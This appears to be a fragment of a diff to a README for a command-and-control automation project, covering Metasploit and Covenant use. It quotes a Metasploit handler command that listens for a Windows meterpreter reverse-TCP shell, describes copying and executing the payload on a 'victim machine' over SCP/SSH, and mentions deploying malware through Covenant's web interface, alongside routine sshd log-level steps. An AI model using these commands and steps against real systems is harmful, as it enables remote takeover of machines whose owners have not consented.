HungAnhVu/C2abstraction/README.md

         NOTE: in the code this whole sequence is chained into one line on line 46: 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost {target_ip}; set lport {target_port}; exploit;

     How to track if HTTP commands/connections are going through?
         -You can catch the logs of the HTTP connections in real time by
             * going to /etc
             * then go to /ssh
             * then use 'nano' command to edit the 'sshd_config' file
             * look for the line '#LogLevel INFO'
             * remove the # then replace INFO with 'VERBOSE'
             * now run 'sudo journalctl -f' in the command line to track the logs

     How to run the payload on the victim machine?
-    - Using SCP we can connect to
+        - Using SCP we can connect to the victim machine via SSH and execute the payload

-COVENANT:
+# COVENANT:
 NOTE: What is the difference between covenant and metasploit?
         - Covenant has a web GUI that requires a script to control the mouse to deploy the malware